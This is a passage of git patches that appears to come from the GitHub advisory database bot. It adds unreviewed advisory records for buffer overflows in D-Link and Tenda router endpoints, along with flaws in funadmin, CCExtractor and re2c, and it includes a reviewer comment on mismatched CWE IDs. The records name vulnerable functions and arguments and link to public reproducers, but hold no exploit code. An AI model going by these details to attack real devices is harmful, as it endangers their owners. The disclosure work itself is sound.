"severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-21T20:16:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json b/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json new file mode 100644 index 0000000000000..74e42168b7dba --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-w4gp-396m-45pm/GHSA-w4gp-396m-45pm.json 
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-w4gp-396m-45pm",
+ "modified": "2026-02-21T21:30:27Z",
+ "published": "2026-02-21T21:30:27Z",
+ "aliases": [
+ "CVE-2026-2884"
+ ],
+ "details": "A vulnerability was identified in D-Link DWR-M960 1.01.07. The affected element is the function sub_41914C of the file /boafrm/formWanConfigSetup of the component WAN Interface Setting Handler. The manipulation of the argument submit-url leads to stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is publicly available and might be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2884"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/LX-66-LX/cve-new/issues/18"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347178"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347178"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.754493"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.dlink.com"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T21:16:10Z"
+ }
+}
\ No newline at end of file
From 493d9913b9a0f2e1df9a3ed1ab35901d0757233d Mon Sep 17 00:00:00 2001
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 00:32:47 +0000 Subject: [PATCH 40/77] Publish Advisories GHSA-5m2g-4cf6-c3rg GHSA-8hhx-xq9j-xwfj GHSA-fmr2-m7gc-577w GHSA-pc25-pwr8-gpp2 --- .../GHSA-5m2g-4cf6-c3rg.json | 56 +++++++++++++++ .../GHSA-8hhx-xq9j-xwfj.json | 56 +++++++++++++++ .../GHSA-fmr2-m7gc-577w.json | 56 +++++++++++++++ .../GHSA-pc25-pwr8-gpp2.json | 72 +++++++++++++++++++ 4 files changed, 240 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json
diff --git a/advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json b/advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json
new file mode 100644
index 0000000000000..5e2db77238780
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5m2g-4cf6-c3rg/GHSA-5m2g-4cf6-c3rg.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5m2g-4cf6-c3rg",
+ "modified": "2026-02-22T00:31:01Z",
+ "published": "2026-02-22T00:31:01Z",
+ "aliases": [
+ "CVE-2026-2896"
+ ],
+ "details": "A weakness has been identified in funadmin up to 7.1.0-rc4. This affects the function setConfig of the file app/backend/controller/Ajax.php of the component Configuration Handler. Executing a manipulation can lead to improper authorization. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2896"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/3"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/3#issue-3884949083"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347207"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347207"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753972"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-266"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T00:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json b/advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json
new file mode 100644
index 0000000000000..2d535154c3d00
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8hhx-xq9j-xwfj/GHSA-8hhx-xq9j-xwfj.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8hhx-xq9j-xwfj",
+ "modified": "2026-02-22T00:31:01Z",
+ "published": "2026-02-22T00:31:01Z",
+ "aliases": [
+ "CVE-2026-2894"
+ ],
+ "details": "A vulnerability was identified in funadmin up to 7.1.0-rc4. Affected by this vulnerability is the function getMember of the file app/frontend/view/login/forget.html. Such manipulation leads to information disclosure. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2894"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/1"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/1#issue-3884896592"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347205"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347205"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753969"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-200"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T23:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json b/advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json
new file mode 100644
index 0000000000000..0a82171982548
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fmr2-m7gc-577w/GHSA-fmr2-m7gc-577w.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-fmr2-m7gc-577w",
+ "modified": "2026-02-22T00:31:01Z",
+ "published": "2026-02-22T00:31:01Z",
+ "aliases": [
+ "CVE-2026-2895"
+ ],
+ "details": "A security flaw has been discovered in funadmin up to 7.1.0-rc4. Affected by this issue is the function repass of the file app/frontend/controller/Member.php. Performing a manipulation of the argument forget_code/vercode results in weak password recovery. Remote exploitation of the attack is possible. The attack's complexity is rated as high. The exploitation is known to be difficult. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2895"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/2"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/I4m6da/CVE/issues/2#issue-3884919985"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347206"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347206"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.753971"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-640"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T23:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json b/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json
new file mode 100644
index 0000000000000..66b1deda3652e
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-pc25-pwr8-gpp2/GHSA-pc25-pwr8-gpp2.json
@@ -0,0 +1,72 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-pc25-pwr8-gpp2",
+ "modified": "2026-02-22T00:31:01Z",
+ "published": "2026-02-22T00:31:01Z",
+ "aliases": [
+ "CVE-2026-2889"
+ ],
+ "details": "A vulnerability was detected in CCExtractor up to 0.96.5. Affected is the function processmp4 in the library src/lib_ccx/mp4.c. Performing a manipulation results in use after free. The attack is only possible with local access. The exploit is now public and may be used. Upgrading to version 0.96.6 is able to address this issue. The patch is named fd7271bae238ccb3ae8a71304ea64f0886324925. You should upgrade the affected component.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2889"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CCExtractor/ccextractor/issues/2055"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CCExtractor/ccextractor/pull/2057"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CCExtractor/ccextractor/commit/fd7271bae238ccb3ae8a71304ea64f0886324925"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CCExtractor/ccextractor"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/CCExtractor/ccextractor/releases/tag/v0.96.6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oneafter/0123/blob/main/cc3/repro"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347182"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347182"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755029"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-21T22:15:59Z"
+ }
+}
\ No newline at end of file
From 963212444aefac6c43168dd73867ba3a317d2c55 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 03:32:04 +0000 Subject: [PATCH 41/77] Publish Advisories GHSA-2665-m8rg-c7xp GHSA-2hp3-cccc-h69r GHSA-7948-p5vf-r2m4 GHSA-83cp-rj94-v2g2 GHSA-8pgv-26pm-rgm8 GHSA-gcxp-xg77-798j GHSA-jcjg-5j5x-r2hc GHSA-jgr4-277v-42mv GHSA-rfh7-7v27-6p9r --- .../GHSA-2665-m8rg-c7xp.json | 56 +++++++++++++++ .../GHSA-2hp3-cccc-h69r.json | 56 +++++++++++++++ .../GHSA-7948-p5vf-r2m4.json | 68 +++++++++++++++++++ .../GHSA-83cp-rj94-v2g2.json | 56 +++++++++++++++ .../GHSA-8pgv-26pm-rgm8.json | 56 +++++++++++++++ .../GHSA-gcxp-xg77-798j.json | 56 +++++++++++++++ .../GHSA-jcjg-5j5x-r2hc.json | 52 ++++++++++++++ .../GHSA-jgr4-277v-42mv.json | 56 +++++++++++++++ .../GHSA-rfh7-7v27-6p9r.json | 56 +++++++++++++++ 9 files changed, 512 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json create mode 100644 advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json create mode 100644 advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json create mode 100644 advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jcjg-5j5x-r2hc/GHSA-jcjg-5j5x-r2hc.json create mode 100644 advisories/unreviewed/2026/02/GHSA-jgr4-277v-42mv/GHSA-jgr4-277v-42mv.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rfh7-7v27-6p9r/GHSA-rfh7-7v27-6p9r.json
diff --git a/advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json b/advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json
new file mode 100644
index 0000000000000..b13dfddc271a6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2665-m8rg-c7xp/GHSA-2665-m8rg-c7xp.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2665-m8rg-c7xp",
+ "modified": "2026-02-22T03:30:26Z",
+ "published": "2026-02-22T03:30:26Z",
+ "aliases": [
+ "CVE-2026-2908"
+ ],
+ "details": "A security vulnerability has been detected in Tenda HG9 300001138. Affected by this issue is some unknown functionality of the file /boaform/formLoopBack of the component Loopback Detection Configuration Endpoint. Such manipulation of the argument Ethtype leads to stack-based buffer overflow. The attack can be executed remotely. The exploit has been disclosed publicly and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2908"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/QIU-DIE/cve-nneeww/issues/10"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347217"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347217"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755202"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenda.com.cn"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T02:16:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json b/advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json
new file mode 100644
index 0000000000000..80bb053fb03ad
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2hp3-cccc-h69r/GHSA-2hp3-cccc-h69r.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2hp3-cccc-h69r",
+ "modified": "2026-02-22T03:30:27Z",
+ "published": "2026-02-22T03:30:27Z",
+ "aliases": [
+ "CVE-2026-2906"
+ ],
+ "details": "A security flaw has been discovered in Tenda HG9 300001138. Affected is an unknown function of the file /boaform/formSamba of the component Samba Configuration Endpoint. The manipulation of the argument sambaCap results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been released to the public and may be used for attacks.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2906"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/QIU-DIE/cve-nneeww/issues/8"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347215"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347215"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755193"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenda.com.cn"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T02:16:57Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json b/advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json
new file mode 100644
index 0000000000000..b8ccdf71f61ad
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-7948-p5vf-r2m4/GHSA-7948-p5vf-r2m4.json
@@ -0,0 +1,68 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-7948-p5vf-r2m4",
+ "modified": "2026-02-22T03:30:26Z",
+ "published": "2026-02-22T03:30:26Z",
+ "aliases": [
+ "CVE-2026-2903"
+ ],
+ "details": "A flaw has been found in skvadrik re2c up to 4.4. Impacted is the function check_and_merge_special_rules of the file src/parse/ast.cc. This manipulation causes null pointer dereference. The attack can only be executed locally. The exploit has been published and may be used. Patch name: febeb977936f9519a25d9fbd10ff8256358cdb97. It is suggested to install a patch to address this issue.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2903"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/skvadrik/re2c/issues/571"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/skvadrik/re2c/issues/571#issuecomment-3837675101"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/skvadrik/re2c/commit/febeb977936f9519a25d9fbd10ff8256358cdb97"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/oneafter/0202/blob/main/re/repro"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/skvadrik/re2c"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347210"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347210"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755030"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-404"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T01:16:00Z"
+ }
+}
\ No newline at end of file
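Review bot: `cwe_ids` in this new record is `"CWE-404"` (improper resource shutdown or release), while the `details` string describes a null pointer dereference in check_and_merge_special_rules; `"CWE-476"` is the entry that matches that text. The same mismatch shows up in two other added records: GHSA-pc25-pwr8-gpp2 describes a use after free but carries `"CWE-119"` where `"CWE-416"` fits, and GHSA-gcxp-xg77-798j describes deserialization but carries `"CWE-20"` where `"CWE-502"` fits. Anyone triaging or filtering advisories by CWE would bucket these three under a broader or unrelated class. The values presumably come from the upstream CVE record, so the correction may need to be made there as well as here.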
diff --git a/advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json b/advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json
new file mode 100644
index 0000000000000..caa4e95219602
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-83cp-rj94-v2g2/GHSA-83cp-rj94-v2g2.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-83cp-rj94-v2g2",
+ "modified": "2026-02-22T03:30:26Z",
+ "published": "2026-02-22T03:30:26Z",
+ "aliases": [
+ "CVE-2026-2905"
+ ],
+ "details": "A vulnerability was identified in Tenda HG9 300001138. This impacts an unknown function of the file /boaform/formWlanSetup of the component Wireless Configuration Endpoint. The manipulation of the argument ssid leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit is publicly available and might be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2905"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/QIU-DIE/cve-nneeww/issues/7"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347214"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347214"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755167"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenda.com.cn"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T02:16:56Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json b/advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json
new file mode 100644
index 0000000000000..f35bf25f350e8
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8pgv-26pm-rgm8/GHSA-8pgv-26pm-rgm8.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8pgv-26pm-rgm8",
+ "modified": "2026-02-22T03:30:26Z",
+ "published": "2026-02-22T03:30:26Z",
+ "aliases": [
+ "CVE-2026-2909"
+ ],
+ "details": "A vulnerability was detected in Tenda HG9 300001138. This affects an unknown part of the file /boaform/formPing of the component Diagnostic Ping Endpoint. Performing a manipulation of the argument pingAddr results in stack-based buffer overflow. The attack is possible to be carried out remotely. The exploit is now public and may be used.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2909"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/QIU-DIE/cve-nneeww/issues/11"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.347218"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.347218"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.755211"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.tenda.com.cn"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-22T02:16:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json b/advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json
new file mode 100644
index 0000000000000..eba2166fc15ef
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-gcxp-xg77-798j/GHSA-gcxp-xg77-798j.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-gcxp-xg77-798j",
+ "modified": "2026-02-22T03:30:26Z",
+ "published": "2026-02-22T03:30:26Z",
+ "aliases": [
+ "CVE-2026-2898"
+ ],
+ "details": "A vulnerability was detected in funadmin up to 7.1.0-rc4. This issue affects the function getMember of the file app/common/service/AuthCloudService.php of the component Backend Endpoint. The manipulation of the argument cloud_account results in deserialization. The attack may be performed from remote. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.",
+ "severity": [
+ {
